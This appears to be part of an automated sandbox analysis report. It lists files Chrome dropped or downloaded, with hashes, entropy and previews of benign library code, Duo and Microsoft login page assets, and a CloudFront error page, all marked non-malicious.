                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:1
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (47671)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):47672
                                                                                                                                          Entropy (8bit):5.401921124762015
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                                                                          MD5:B804BCD42117B1BBE45326212AF85105
                                                                                                                                          SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                                                                          SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                                                                          SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 98 x 93, 8-bit/color RGB, non-interlaced
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):61
                                                                                                                                          Entropy (8bit):4.035372245524405
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:yionv//thPlNGpMl8kxl/k4E08up:6v/lhP+pk8k7Tp
                                                                                                                                          MD5:AD2BF08E909CB9F989C7BADBF87006CE
                                                                                                                                          SHA1:05E8412EFBA014BF06DAC17941F8121C5D4D6C17
                                                                                                                                          SHA-256:12BF9CC8C45B62C86354CD7FA4E2B3A3CE93B2DC28F1430B953699506B58D5E6
                                                                                                                                          SHA-512:3A7DAFC24D515A3214B25D410ABB6EF25107509142AE0BBCB53EEADB87AFEB29D49BA551D8C2280C2689A523DEBCDFEB0B311A6615B4692A992AB5732FE47117
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e45aa726acf4857/1731908848543/5Iv_qXWII0BR-3-
                                                                                                                                          Preview:.PNG........IHDR...b...].......$!....IDAT.....$.....IEND.B`.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1797
                                                                                                                                          Entropy (8bit):5.5527215093394755
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:lmIzz/pQTVWbErTVMrJEeWPF0IH3Ivma4L8j:1zz/Qa4SrJlWPFpH3r1LE
                                                                                                                                          MD5:AC1CE64BBBE1867E110CA6E2980215D2
                                                                                                                                          SHA1:6761231A5422395CD9662B621A76D389A0668743
                                                                                                                                          SHA-256:DC06AF337D8E2FF0F2D0928B816B9DAAE370E78BB3914A24DC15D3B7BA74446C
                                                                                                                                          SHA-512:2D4563332B825D3AFDF8D287F6E5FD0362BA4C8905EAC6FAA79F997D1767F3C47F492B34352A12E97DE64ABD367353DC5BE815E8024D7AFC373C32BAF3962AB0
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<title>Login</title>.<meta charset="utf-8" />.<meta name="viewport" content="width=device-width, initial-scale=1">.<link rel="stylesheet" href="&#x2f;static&#x2f;css&#x2f;page&#x2f;login.css&#x3f;v&#x3d;8850e">.<link rel="shortcut icon" href="&#x2f;static&#x2f;images&#x2f;favicon_duo.ico&#x3f;v&#x3d;e3716" />.</head>.<body>.<div.id="login-parent".data-authkey="ASTS433IHPJIMHYRD0E8".data-scid="4873fe428ab243529767cba103466e46".data-restart-auth-url="https&#x3a;&#x2f;&#x2f;sso-dbbfec7f.sso.duosecurity.com&#x2f;ws&#x2f;sp&#x2f;DIXH9AVY8FAAKO04PYZ8&#x2f;passive&#x3f;scid&#x3d;4873fe428ab243529767cba103466e46".data-phishing-protection-enabled="True".data-remember-username-enabled="True".data-nojs-action="&#x2f;login&#x2f;nojs".data-custom-background="".data-custom-background-color="&#x23;E7E9ED".data-custom-accent-color="&#x23;155CD
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):89501
                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):3452
                                                                                                                                          Entropy (8bit):5.117912766689607
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://login.live.com/Me.htm?v=3
                                                                                                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2672
                                                                                                                                          Entropy (8bit):6.640973516071413
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):919
                                                                                                                                          Entropy (8bit):5.433553116044425
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:W7Iqes+57ShSa8rcUezjIykgxwK8rPOm1J:mIqet5TI7xwlzJ
                                                                                                                                          MD5:14A64546CB8A2BA8144B08EA3B356EAA
                                                                                                                                          SHA1:C85C15D9A21FFA35F02F4D742C22A67F71227C2E
                                                                                                                                          SHA-256:9F70FEC4297B289A1884928777074CF4ECC445F67DA31CFD32616EE8E1925E4C
                                                                                                                                          SHA-512:6CFC3BA6795EE9DD706D0286744A6306B7289B2AA47292DBB252A23B89D2AEE2A7109F473C18910314344A118C7DDD4110D9F855FC9A652B6C36F80282390C22
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>403 ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.Request blocked..We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner..<BR clear="all">.If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: -kS0Ebgj6_i2kQkzEBsIV1wGptySosmGlTNSpVcKyMKfPxAJlcQhjA==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (61177)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):113378
                                                                                                                                          Entropy (8bit):5.285066693137765
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:QpHDgBvguhw+EViazA/PWrF7qvEAFiQcpmQhSeC1Jzc6VUW3:xkXhp6VU0
                                                                                                                                          MD5:9C837C2B6C9C441656C3C64BE6FC6401
                                                                                                                                          SHA1:D44AA83093C4109DDD8FFAEA60755F05D1BFE7D3
                                                                                                                                          SHA-256:68C2994E21A564345EB3B4091DD2334C9CBDDB0AECDA45EE963C6DE2E1629B93
                                                                                                                                          SHA-512:AF04835BCC621FE1793C4661FDB03EDEA16219BAA77F1198AA419F771B6B3DCDAC3DA92676568C207022251483AB79C75AB6DF2CE94924748FF9CEBF64AFF5A2
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css
                                                                                                                                          Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65467)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1031501
                                                                                                                                          Entropy (8bit):5.6014998014243
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:5DMw4MRopAcbhMwdPrCvDlJcIH46k+MahMR2VKUxihesK6XS7mNDqO7:Z6eyhMwdP+MR2VKUxi8t6XS7W17
                                                                                                                                          MD5:D833802E90C567AB8732107292F84CDF
                                                                                                                                          SHA1:D20212711CEF8B07052BEA8A2EA61B68C7182D38
                                                                                                                                          SHA-256:488D0552E3B94396B3647F301F73CFB4B70CAC3F1FE89B15CBE11BCD0667C0A6
                                                                                                                                          SHA-512:6E63152281DD5D2E0ACCA939510A849A53ADFB077E4FC603438426E6314861E06D260D3B1353EA86A8FAF2B1501EF1EC5323083AF339EB3294C4E33C7FA16149
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/static/js/page/email-first.js?v=488d0
                                                                                                                                          Preview:/*! For license information please see email-first.js.LICENSE.txt */.!function(){var leafPrototypes,getProto,__webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__(4910),__webpack_require__(3370),__webpack_require__(8815),__webpack_require__(7875),__webpack_require__(8543),__webpack_require__(7313),__webpack_require__(175),__webpack_require__(2698),__webpack_require__(3629),__webpack_require__(8039),__webpack_require__(2203),__webpack_require__(6312),__webpack_require__(9372),__webpack_require__(1661),__webpack_require__(8250),__webpack_require__(2692),__webpack_require__(9317),__webpack_require__(2856),__webpack_require__(5667),__webpack_require__(8463),__webpack_require__(3459),__webpack_require__(9e3),__webpack_require__(8866),__webpack_require__(9607),__webpack_require__(7709),__webpack_require__(6679),__webpack_require__(458),__webpack_require__(1893),__webpack_require__(7793),__webpack_req
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):3651
                                                                                                                                          Entropy (8bit):4.094801914706141
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                                          MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                                          SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                                          SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                                          SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1864
                                                                                                                                          Entropy (8bit):5.222032823730197
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):3620
                                                                                                                                          Entropy (8bit):6.867828878374734
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):89501
                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3651
                                                                                                                                          Entropy (8bit):4.094801914706141
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                                          MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                                          SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                                          SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                                          SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
